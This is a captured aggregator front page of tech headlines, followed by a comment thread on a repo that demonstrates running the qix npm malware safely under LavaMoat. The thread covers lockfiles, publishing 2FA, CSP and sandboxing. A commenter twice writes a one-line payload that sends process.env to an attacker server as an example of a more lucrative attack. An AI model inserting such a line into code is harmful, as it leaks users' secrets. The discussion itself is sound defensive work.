frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Logic Puzzles: Why the Liar Is the Helpful One

https://blog.szczepan.org/blog/knights-and-knaves/
1•wasabi991011•3m ago•0 comments

Optical Combs Help Radio Telescopes Work Together

https://hackaday.com/2026/02/03/optical-combs-help-radio-telescopes-work-together/
1•toomuchtodo•8m ago•1 comments

Show HN: Myanon – fast, deterministic MySQL dump anonymizer

https://github.com/ppomes/myanon
1•pierrepomes•14m ago•0 comments

The Tao of Programming

http://www.canonical.org/~kragen/tao-of-programming.html
1•alexjplant•15m ago•0 comments

Forcing Rust: How Big Tech Lobbied the Government into a Language Mandate

https://medium.com/@ognian.milanov/forcing-rust-how-big-tech-lobbied-the-government-into-a-langua...
1•akagusu•16m ago•0 comments

PanelBench: We evaluated Cursor's Visual Editor on 89 test cases. 43 fail

https://www.tryinspector.com/blog/code-first-design-tools
2•quentinrl•18m ago•1 comments

Can You Draw Every Flag in PowerPoint? (Part 2) [video]

https://www.youtube.com/watch?v=BztF7MODsKI
1•fgclue•23m ago•0 comments

Show HN: MCP-baepsae – MCP server for iOS Simulator automation

https://github.com/oozoofrog/mcp-baepsae
1•oozoofrog•27m ago•0 comments

Make Trust Irrelevant: A Gamer's Take on Agentic AI Safety

https://github.com/Deso-PK/make-trust-irrelevant
2•DesoPK•31m ago•0 comments

Show HN: Sem – Semantic diffs and patches for Git

https://ataraxy-labs.github.io/sem/
1•rs545837•32m ago•1 comments

Hello world does not compile

https://github.com/anthropics/claudes-c-compiler/issues/1
17•mfiguiere•38m ago•3 comments

Show HN: ZigZag – A Bubble Tea-Inspired TUI Framework for Zig

https://github.com/meszmate/zigzag
2•meszmate•40m ago•0 comments

Metaphor+Metonymy: "To love that well which thou must leave ere long"(Sonnet73)

https://www.huckgutman.com/blog-1/shakespeare-sonnet-73
1•gsf_emergency_6•42m ago•0 comments

Show HN: Django N+1 Queries Checker

https://github.com/richardhapb/django-check
1•richardhapb•57m ago•1 comments

Emacs-tramp-RPC: High-performance TRAMP back end using JSON-RPC instead of shell

https://github.com/ArthurHeymans/emacs-tramp-rpc
1•todsacerdoti•1h ago•0 comments

Protocol Validation with Affine MPST in Rust

https://hibanaworks.dev
1•o8vm•1h ago•1 comments

Female Asian Elephant Calf Born at the Smithsonian National Zoo

https://www.si.edu/newsdesk/releases/female-asian-elephant-calf-born-smithsonians-national-zoo-an...
3•gmays•1h ago•0 comments

Show HN: Zest – A hands-on simulator for Staff+ system design scenarios

https://staff-engineering-simulator-880284904082.us-west1.run.app/
1•chanip0114•1h ago•1 comments

Show HN: DeSync – Decentralized Economic Realm with Blockchain-Based Governance

https://github.com/MelzLabs/DeSync
1•0xUnavailable•1h ago•0 comments

Automatic Programming Returns

https://cyber-omelette.com/posts/the-abstraction-rises.html
1•benrules2•1h ago•1 comments

Why Are There Still So Many Jobs? The History and Future of Workplace Automation [pdf]

https://economics.mit.edu/sites/default/files/inline-files/Why%20Are%20there%20Still%20So%20Many%...
2•oidar•1h ago•0 comments

The Search Engine Map

https://www.searchenginemap.com
1•cratermoon•1h ago•0 comments

Show HN: Souls.directory – SOUL.md templates for AI agent personalities

https://souls.directory
1•thedaviddias•1h ago•0 comments

Real-Time ETL for Enterprise-Grade Data Integration

https://tabsdata.com
1•teleforce•1h ago•0 comments

Economics Puzzle Leads to a New Understanding of a Fundamental Law of Physics

https://www.caltech.edu/about/news/economics-puzzle-leads-to-a-new-understanding-of-a-fundamental...
3•geox•1h ago•1 comments

Switzerland's Extraordinary Medieval Library

https://www.bbc.com/travel/article/20260202-inside-switzerlands-extraordinary-medieval-library
4•bookmtn•1h ago•0 comments

A new comet was just discovered. Will it be visible in broad daylight?

https://phys.org/news/2026-02-comet-visible-broad-daylight.html
5•bookmtn•1h ago•0 comments

ESR: Comes the news that Anthropic has vibecoded a C compiler

https://twitter.com/esrtweet/status/2019562859978539342
2•tjr•1h ago•0 comments

Frisco residents divided over H-1B visas, 'Indian takeover' at council meeting

https://www.dallasnews.com/news/politics/2026/02/04/frisco-residents-divided-over-h-1b-visas-indi...
5•alephnerd•1h ago•5 comments

If CNN Covered Star Wars

https://www.youtube.com/watch?v=vArJg_SU4Lc
1•keepamovin•1h ago•1 comments
Open in hackernews

You too can run malware from NPM (I mean without consequences)

https://github.com/naugtur/running-qix-malware
195•naugtur•5mo ago

Comments

cluckindan•5mo ago
LavaMoat looks great on paper, but not supporting Webpack HMR is a dealbreaker.
naugtur•5mo ago
You're using HMR in your app's production bundle? How?
naugtur•5mo ago
If you mean during development - you can opt out of using lavamoat in development for your webpack bundle (I'm assuming you're not running your untested code on valuable data)
cluckindan•5mo ago
Well, that’s not exactly reassuring. Having a very different runtime environment in production is grounds for hard to debug issues.

Is it possible to generate the allowlist at development time without having the webpack plugin loaded? If it’s only generated at build time, it won’t protect against malicious packages getting installed in CI just before the build happens.

naugtur•5mo ago
You need to juggle two builds - one while you're iterating rapidly and another when you're near start and finish of the increment. Not a lot of work compared to auditing a thousand packages.

Try it and see. There's tradeoffs but if you roll it out, it is very powerful.

mohsen1•5mo ago
npm should take responsibility and up their game here. It’s possible to analyze the code and mark it as suspicious and delay the publish for stuff like this. It should prevent publishing code like this even if I have a gun to my head
sesm•5mo ago
I think malware check should be opt-in for package authors, but provide some kind of 'verified' badge to the package.

Edit: typo

naugtur•5mo ago
npm is on life support by msft. But there's socket.dev that can tell you if a package is malicious within hours of it being published.
shreddit•5mo ago
“within hours” is at least one hour too late, and most likely multiple hours.
naugtur•5mo ago
Absolutely not. you get npm packages by pulling not them pushing them to you as soon as a new version exist. The likelyhood of you updating instantly is close to zero and if not, you should set your stuff up so that it is. Many ways to do that. Even better if compared to a month or two - which is how long it often takes for a researcher to find a carefully planted malware.

Anyway, the case where reactive tools (detections, warnings) don't catch it is why LavaMoat exists. It prevents whole classes of malware from working at runtime. The article (and repo) demonstrates that.

rs186•5mo ago
Sure, it should never happen in CI environment. But I bet that every second, someone in the world is running "npm install" to bring in a new dependency to a new/existing project, and the impact of a malicious release can be broad very quickly. Vibe coding is not going to slow this down.
naugtur•5mo ago
Vibe coding brings up the need for even more granular isolation. I'm on it ;)

LavaMoat Webpack Plugin will soom have the ability to treat parts of your app same as it currently treats packages - with isolation and policy limiting what they can do.

bavarianbob•5mo ago
I've worked in software supply chain security for two years now and this is an extremely optimistic take. Nearly all organizations are not even remotely close to this level of responsiveness.
naugtur•4mo ago
Again, that's why LavaMoat exists. Set it up once and it will block many classes of attacks regardless of where they come from.
Cthulhu_•5mo ago
Depends on whether they hold publishing to the main audience until said scan has finished.
Cthulhu_•5mo ago
I always thought this would be the ideal monetization path for NPM; enterprises pay them, NPM only supplies verified package releases, ideally delayed by hours/days after release so that anything that slips through the cracks has a chance to get caught.
chrisweekly•5mo ago
Enterprises today typically use a custom registry, which can include any desired amount of scans and rigorous controls.
johannes1234321•5mo ago
That would put them into liability or be a quite worthless agreement taking no responsibility.
yjftsjthsd-h•5mo ago
> but provide some kind of 'verified' badge to the package

I would worry that that results in a false sense of security. Even if the actual badge says "passes some heuristics that catch only the most obvious malicious code", many people will read "totally 100% safe, please use with reckless abandon".

madeofpalk•5mo ago
They already have this

https://docs.npmjs.com/trusted-publishers

https://docs.npmjs.com/generating-provenance-statements

untitaker_•5mo ago
i can guarantee you npm will externalize the cost of false-positive malware scans to package authors.
nodesocket•5mo ago
Or at a minimum support yubikey for 2fa.
worthless-trash•5mo ago
Original author could be evil. 2fa does nothing.
jamesnorden•5mo ago
If my grandma had wheels she'd be a bike. You don't need to attack the problem from only one angle.
worthless-trash•5mo ago
Your grandma is a bike then. The 2fa is going to solve nothing and any attacker worth their salt knows it.
singulasar•5mo ago
unphishable 2fa would have prevented this specific case tho... what are you talking about?
mcintyre1994•5mo ago
They do, I use a yubikey and it requires me to authenticate with it whenever I publish. They do support weaker 2fa methods as well, but you can choose.
azemetre•5mo ago
Why would npm care? They're basically a monopoly in the JS world and under the stewardship of a company that doesn't even care when its host nation gets hacked when using their software due to their ineptitude.
clbrmbr•5mo ago
How much money have the attackers stolen so far? Has someone done an analysis of the blockchains for the destination addresses?
naugtur•5mo ago
click through to the article, it has a link to a view that lists the laughable profit
clbrmbr•5mo ago
Huh. I read TFA in detail (and shared with my team), but I didn’t see any analysis. (?)
crtasm•5mo ago
I think they mean the link to https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...
hiccuphippo•5mo ago
It seems to be this: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

500 USD, not bad for a month of work if the author is from a 3rd world country.

naugtur•5mo ago
there's only one transaction that's making up most of it. Someone lost some serious 0.1 ETH or so.

500$ is nothing. it's what unsophisticated phishing makes in a day. It's what a support call scammer makes their owner in a day.

This was an attack on legitimate npm packages that end up in maybe hundreds of thousands of developer machines building tens of thousands applications.

`fetch(myserverurl+JSON.stringify(process.env)` would be orders of magnitude more profitable as payload.

javcasas•5mo ago
3rd world country developers routinely earn more than that.

A shitty junior developer in Ecuador easily pulls 700-800 per month. If they are any competent, they can double that in an outsourcing consultancy.

Cthulhu_•5mo ago
"3rd world country" is an outdated cold war phrase usually incorrectly used to describe wealth or development status (it originally meant "anything not NATO or Warsaw Pact"); China is a third world country by that merit, but it's the second richest country (by GDP) in the world.

"Developing" or "poor" country may be a more accurate phrase.

wodenokoto•5mo ago
> I won't go into this either, but you can take a look at the summary of "donations" some other friends linked to here: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

>Pretty low impact for an attack this big. Some of it seems to be people mocking the malware author with worthless transfers.

I believe this is the section. As far as I understand the link, it's about $500. I don't understand how you read if a donation is a worthless mockery donation.

naugtur•5mo ago
I work with people who understand this stuff :D But if I see a transaction for thousands or millions of a coin I've never heard of with $ value of about 1 it's likely a shitcoin and I am guessing - mockery.
nodesocket•5mo ago
I'm actually shocked they have not stolen more seeing the breach impact radius? Perhaps we can thank wallets and exchanges for blacklisting the addresses and showing huge warnings like the one shown in the article.
shreddit•5mo ago
It was discovered pretty quickly, i don’t think most “big” projects update their packages within minutes of publication.
pixl97•5mo ago
Really I'd say the key here is timing. I didn't look into what time the NPM packages were updated, but there are a few key times depending on what markets you're targeting. If it were Indian devs it would be around 2AM CST and if it's US devs it would be around 10AM CST.

This is when I see the ramp up in queuing in CI/CD builds that lasts a few hours across companies and is more likely to trigger a package getting rebuilt.

zachrip•5mo ago
It was also packages that in my experience don't often find themselves on the frontend.
naugtur•5mo ago
- the attack it shipped was not a great fit for the packages compromised. `fetch(myserverurl+JSON.stringify(process.env))` would be a much more profitable payload - naive obfuscation makes lights go red in so many places it'd be better to not obfuscate at all. - the addresses were marked as malicious by Blockaid sooner than the package could reach production in most apps. Most wallets were ready to warn users early enough.
p2detar•5mo ago
I’ve been out of the loop with npm for a while, but are there still no package namespaces?
uallo•5mo ago
https://docs.npmjs.com/about-scopes
diggan•5mo ago
Namespaces have existed since ~2016 at least in npm, but since it's not enforced and people want "nice looking" package names, the ecosystem still hasn't fully embraced it. It seems like more and more projects are using them (probably because all "good" names are already taken), but probably way less than half of all popular packages are scoped/namespaced.
keysdev•5mo ago
Well there is jsr now....
stby•5mo ago
I am also out of the loop here, how would namespaces have helped?
clbrmbr•5mo ago
Is it typical in the JS space to include dependencies without versioning?

Also, curious: does freezing a version really provide much protection? Shouldn’t a commit hash be used? (Attacker can change a tag.)

naugtur•5mo ago
packages published to npm are immutable. if you pin a version, you get the same exact version as long as MSFT servers are not compromised.

Installing from git is not recommended and has more issues than you might think https://dev.to/naugtur/a-phish-on-a-fork-no-chips-52cc

You are supposed to update packages, even if you use lockfiles (very common) or tools that pin your direct dependencies (renovate etc. not so common) And when you do update, will you read the package and all of its updated dependencies?

It's a hard problem with a bunch of tradeoffs.

Can be done, with enough attention and tools. Tools include LavaMoat :)

clbrmbr•5mo ago
Re: updates: I was just thinking of waiting a few weeks on the updates to allow compromised packages to be discovered.
naugtur•5mo ago
socket.dev will find most malware within hours of it being published.

with LavaMoat most malware won't work even if you don't detect it.

whilenot-dev•5mo ago
> packages published to npm are immutable.

Depends how you'd refer to them... tags ("@latest", "@next" etc.) are not immutable and it's best to rely on the checksums in the lock file.

vel0city•5mo ago
The package-lock.json includes a hash of the package, not just a version number which should be immutable.
whilenot-dev•5mo ago
To add to this: the hash in the lock file is the checksum of the published tarball, not the commit hash.
cluckindan•5mo ago
And then someone runs `npm install` on their CI
herpdyderp•5mo ago
I’m intrigued but is that compartmentalization not incredibly expensive?
naugtur•5mo ago
It's within the same process and realm (window) It has a cost, but it's nothing compared to putting every dependency of a large app in a separate iframe/process and figure out a way for them to communicate.
cluckindan•5mo ago
Have you tried to find ways to break it?

Plenty of objects in the browser API contain references to things that could be used to defeat the compartmentalization.

If one were to enumerate all properties on window and document, how many would be objects with a reference back to window, document or some API not on the allowed list?

cowbertvonmoo•5mo ago
I maintain ses, the compartment primitive LavaMoat relies on. The ses shim for hardenedjs.org creates compartments that deny guest code the ability to inspect the true global object or lexically reference any of its properties. By default, each compartment only sees the transitively frozen intrinsics like Array and Object, and no way to reach the genuine evaluators. The compartment traps the module loader as well, so you can only import modules that are explicitly injected. That leaves a lot of room for the platform to make mistakes and endow the compartment with gadgets, but also gives us a place to stand to mount a defense that is not otherwise prohibitively expensive.
CyberMacGyver•5mo ago
Looks like OP is one of the contributors to LavaMoat
naugtur•5mo ago
Yes, I am. I came up with the first successful attempt at integrating the Principle of Least Authority software in LavaMoat with Webpack and wrote the LavaMoat Webpack Plugin.

Also, together with a bunch of great folks at TC39 we're trying to get enough building blocks for the same-realm isolation primitives into the language.

see hardenedjs.org too

I'm doing the rounds promoting the project today because at this point all we need to eliminate certain types of malware is get LavaMoat a lot more adoption in the ecosystem.

( and that'll give me bug reports and maybe even contributions? :) )

hn92726819•5mo ago
I think most people are fine with promoting a cool project you work on, but it's best practice to disclose that in the article. Even something like "If your project was set up with LavaMoat (a project I've been working on), ..." would be enough.

I think that's why they made the comment.

naugtur•5mo ago
Yup, and thanks - I should have made the comment myself but got distracted.
EasyMark•5mo ago
You're forgiven. Thanks to you (and any other contribs) for the excellent project
btown•5mo ago
I'm often curious about how effective runtime quasi-sandboxing is in practice (at least until support at the TC39 level lands).

My understanding is that if you can run with a CSP that prevents unsafe-eval, and you lock a utility package down to not be able to access the `window` object, you can prevent it from messing with, say, window.fetch.

But what about a package that does assume the existence of window or globalThis? Say, a great many packages bridging non-React components into the React ecosystem. Once a package needs even read-only access to `window`, how do you protect against supply-chain attacks on that package? Even if you read-only proxy that object, for instance, can you ensure that nothing in `window` itself holds a reference to the non-proxied `window`?

Don't get me wrong - this project is tremendously useful as defense-in-depth. But curious about how much of a barrier it creates in practice against a determined attacker.

naugtur•5mo ago
It's based on HardenedJS.org

The sandbox itself is tight, there's a bug bounty even.

The same technology is behind metamask snaps - plugins in a browser extension.

And Moddable has their own implementation

The biggest problem is endowing too powerful capabilities.

We've got ambitious plans for isolating DOM, but that already failed once before.

1oooqooq•5mo ago
so to answer the actual question. if something expects too much browser/dom access to work, it won't?
jefozabuss•5mo ago
Seems like people already forgot about Jia Tan.

By the way why doesn't npm have already a system in place to flag sketchy releases where most of the code looks normal and there is a newly added obfuscated code with hexadecimal variable names and array lookups for execution...

tom1337•5mo ago
It would also be great if a release needs to be approved by the maintainer via a second factor or an E-Mail verification. Once a release has been published to npm, you have an hour to verify it by clicking a link in an email and then enter another 2FA (separate OTP than for login, Passkey, Yubikey whatever). That would also prevent publishing with lost access keys. If you do not verify the release within the first hour it gets deleted and never published.
naugtur•5mo ago
That's why we never went with using keys in CI for publishing. Local machine publishing requires a 2fa.

automated publishing should use something like Pagerduty to signal that a version is being published to a group of maintainers and it requires an approval to go through. And any one of them can veto within 5 minutes.

But we don't have that, so gotta be careful and prepare for the worst (use LavaMoat for that)

Cthulhu_•5mo ago
Not through e-mail links though, that's what caused this in the first place. E-mail notification, sure, but they should also do a phishing training mail - make it legit, but if people press the link they need to be told that NPM will never send them an email with a link.
dist-epoch•5mo ago
> flag sketchy releases

Because the malware writers will keep tweaking the code until it passes that check, just like virus writers submit their viruses to VirusTotal until they are undetected.

galaxy_gas•5mo ago
its Typical that the Virus Writer will use their own service, there is criminal virustotal-clones that run many AV in VM and return the Results, because virustotal will share all binaries, anything upload in Virustotal will be detteceted shortly if it is not.
47282847•4mo ago
Isn’t it still that when signatures are added at some point it turns out that the malware code has been uploaded months before, or did that change?
mystifyingpoi•5mo ago
Detecting sketchy-looking hex codes should be pretty straightforward, but then I imagine there are ways to make sketchy code non-sketchy, which would be immediately used. I can imagine a big JS function, that pretends to do legit data manip, but in the process creates the payload.
nicce•5mo ago
It is just about bringing the classic non-signature based antivirus software to the release cycle. Hard to say how useful it is, but usually it is endless cat-and-mouse play like with everything else.
hombre_fatal•5mo ago
Yeah, It’s merely a fluke that the malware author used some crappy online obfuscator that created those hex code variables. It would have been less work and less suspicious if they just kept their original semantic variables like “originalFetch”.
Cthulhu_•5mo ago
It wouldn't be just one signal, but several - like a mere patch version that adds several kilobytes of code, long lines, etc. Or a release after a long silent period.
cluckindan•5mo ago
A complexity per line check would have flagged it.

Even a max line length check would have flagged it.

chatmasta•5mo ago
That would flag a huge percentage of JS packages that ship with minified code.
jay_kyburz•5mo ago
How are people verifying their dependencies if they are minified?
SethTro•5mo ago
That's the magic part, they aren't
chatmasta•5mo ago
My guy… in the JS ecosystem a “lock file” is something that restricts your package installer to an arbitrary range of packages, i.e. no restrictions at all and completely unpredictable. You have to go out of your way to “pin” a package to a specific version.
Izkata•5mo ago
Lockfiles use exact hashes, not versions/version ranges. Javascript projects use two files, a package file with version ranges (used when upgrading) and a lockfile with the exact version (used in general when installing in an existing project).
zdragnar•5mo ago
NPM is rather infamous for not exactly respecting the lockfile, however.
chatmasta•5mo ago
Sure, but a lockfile with a hash doesn’t mean that next time it will fail if it tries to install a version of the package without that hash. If your package.json specifies a semver range then it’ll pull the latest minor or patch version (which is what happened in this case with e.g. duckdb@1.3.3) and ignore any hash differences if the version has changed. Hence why I say you need to go out of your way to specify an exact version in package.json and then the lock file will work as you might expect a “lock” file to work. (Back when I was an engineer and not a PM with deteriorating coding ability, I had to make a yarn plugin to pin each of our dependencies.)

The best way to manage JS dependencies is to pin them to exact versions and rely on renovate bot to update them. Then at least it’s your choice when your code changes. Ideally you can rebuild your project in a decade from now. But if that’s not possible then at least you should have a choice to accept or decline code changes in your dependencies. This is very hard to achieve by default in the JS ecosystem.

jay_kyburz•5mo ago
I think at some point you would be better off vendoring them in.
chatmasta•5mo ago
That’s effectively what I did in a very roundabout way with docker images and caching that ended up abusing the GitLab free tier for image hosting. When you put it like that it does make me think there was a simpler solution, lol.

When I’m hacking on a C project and it’s got a bunch of code ripped out of another project, I’m like “heh, look at these primordial dependency management practices.” But five years later that thing is gonna compile no problem…

cluckindan•4mo ago
There’s even a command for that: npm pack
cluckindan•4mo ago
Why would you be including minified code in a build? That’s just bad practice and makes development-time debugging more difficult.
saghm•4mo ago
It's not like minified JS can't be parsed and processed as AST. You could still pretty easily split up each statement/assignment to check the length of each one individually.
cchance•5mo ago
Feels like a basic light weight 3b AI model could easily spot shit like this on commit
AtNightWeCode•5mo ago
The problem is that it is even possible to push builds from dev machines.
madeofpalk•5mo ago
With NPM now supporting OIDC, you can just turn this off now https://docs.npmjs.com/trusted-publishers
hulitu•4mo ago
> By the way why doesn't npm have already a system in place to flag sketchy releases

Because nobody gives a fsck. Normally, after npm was filled with malware, people would avoid it. But it seems that nobody (distro maintainers) cares. People get what they asked for (malware).

j45•5mo ago
How does one avoid malware in npm specifically?

Makes me not want to use the ecosystem, which isn’t always possible.

beardyw•5mo ago
>Makes me not want to use the ecosystem

I came to that conclusion long ago.

pimterry•5mo ago
This attack is pretty bad, but as shown by the tiny ROI for the attacker mentioned in this article (about $500 so far: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...) this really isn't quite as ecosystem-catastrophic as it sounds, for a few reasons:

* Major attacks on large packages like this are caught fairly quickly - a few hours in this case - making the vulnerable window _relatively_ small.

* NPM locks installed dependencies by default, against both the version & a hash of the content, so you'll only install the new malicious version if you happen to be adding or updating this dependency specifically within the window this version is still live. It's effectively sort-of TOFU. If even you ran `npm install` in a project already using this dependency in the specific window it was live, you will not normally install the malicious version.

* There's quite a few tools to help mitigate the risk here, like https://socket.dev and npq (https://github.com/lirantal/npq).

As one datapoint, look at the download stats for the affected Chalk package for example (https://www.npmjs.com/package/chalk?activeTab=versions) - the vast majority of installs were not installing the latest version anyway.

There are caveats to this: e.g. you can use npm without a lockfile, in which case a fresh local install can pull down unexpected versions, or you could be manually updating/adding a different package which happens to depend on an affected package (which might trigger a lockfile update, which might then fetch the latest version of the subdependency) during the vulnerable window, or of course it's totally possible you might install the package for the first time at the precisely wrong moment, etc etc.

This is definitely bad, and could have been extremely disastrous if it wasn't caught. But in practice, npm & the ecosystem have put in quite a few protections that do help to _mostly_ mitigate these kind of risks in typical use cases (but not completely, and there's definitely plenty more work to do!) and it's certainly not the case that millions of JS developers & projects were all catastrophically pwned today.

naugtur•5mo ago
Very good summary.

Most other ecosystems are as vulnerable if not more, they just lack the scale.

OP, The malware is coming to the ecosystem you prefer. Give it time.

mapmeld•5mo ago
'npm install' and 'pip install' can both run scripts on your computer. Both ecosystems have this risk and loose monitoring, so there are days where packages are messed up. I don't think you can avoid malware by picking one over the other.
AtNightWeCode•5mo ago
I think JS should be all source and no packages at all.
phil294•5mo ago
What about complex SPAs? Database drivers? Polyfills? TypeScript?
AtNightWeCode•4mo ago
Pulling the source and compiling the package instead of pulling the package. Not much difference. Maybe slower build times but more secure and better builds.
riazrizvi•5mo ago
Glad to see this article raising awareness.

Without fairness in the marketplace, the talent loses the will to play and the economy will further deteriorate. We are all suffering from an international trust breakdown from Covid, and now also from AI spam. If we don’t turn this tide, jobs and business opportunities are going to keep shrinking.

erpderp•5mo ago
In the example snippets from OP, the code shown is in the browser. I'm failing to see how the interception, as described, couldn't be handled by a decent Content Security Policy - instead of requiring yet another npm package. Seems safer than installing another package to address risk from ... installing packages.
ghrl•5mo ago
I suppose if you're using a bundler, you will ship JS bundles including the malicious packages from your own trusted domain. How could CSP prevent this or similar attacks?
erpderp•5mo ago
According to the OP, in this specific case, the malware was mostly just intercepting legitimate fetch(), etc calls. With CSP `connect-src`, I don't think that would be possible unless the new fetch targets are themselves on allow-listed domains (which is a totally separate issue).

For example, consider a CSP of: `Content-Security-Policy: connect-src 'self' https://api.example.com;`: This policy would allow fetch() requests only to the same origin ('self') and to https://api.example.com, blocking any attempts to connect to other domains (typically with a corresponding warning/error in the browser dev console).

That said, in fairness, CSP is of course only applicable to frontend code (not to backend JS, where anecdotally I've seen a lot more usage of `chalk` and some of the other pwned packags), but frontend code and the `window` object is what the OP used in their examples and seems like they're targeting w/ webpack, hence my mentioning CSP.

4ndrewl•5mo ago
If you're not vendoring, there's an argument to say that some portion of your source code is fair game to anyone who has commit rights to a variety of repos.
withinrafael•5mo ago
In July, packages were loading malicious DLLs (on Windows targets) [1]. It doesn't appear Lavamoat would help in that scenario. Is that right? If so, how do you mitigate this? Run everything in a container?

[1] https://www.crowdstrike.com/en-us/blog/crowdstrike-falcon-pr...

mike-cardwell•5mo ago
https://gitlab.com/grepular/safernode
withinrafael•4mo ago
Thanks will check it out!
naugtur•5mo ago
1. Control lifecycle scripts with @lavamoat/allow-scripts

2. Do local dev with https://github.com/lavamoat/kipuka installed (I'm working on it)

3. If you don't permit the APIs used for loading DLLs they won't load themselves, so runtime protections are valid too. But I recall the DLLs were loaded in lifecycle script.

withinrafael•4mo ago
Thanks will check both out!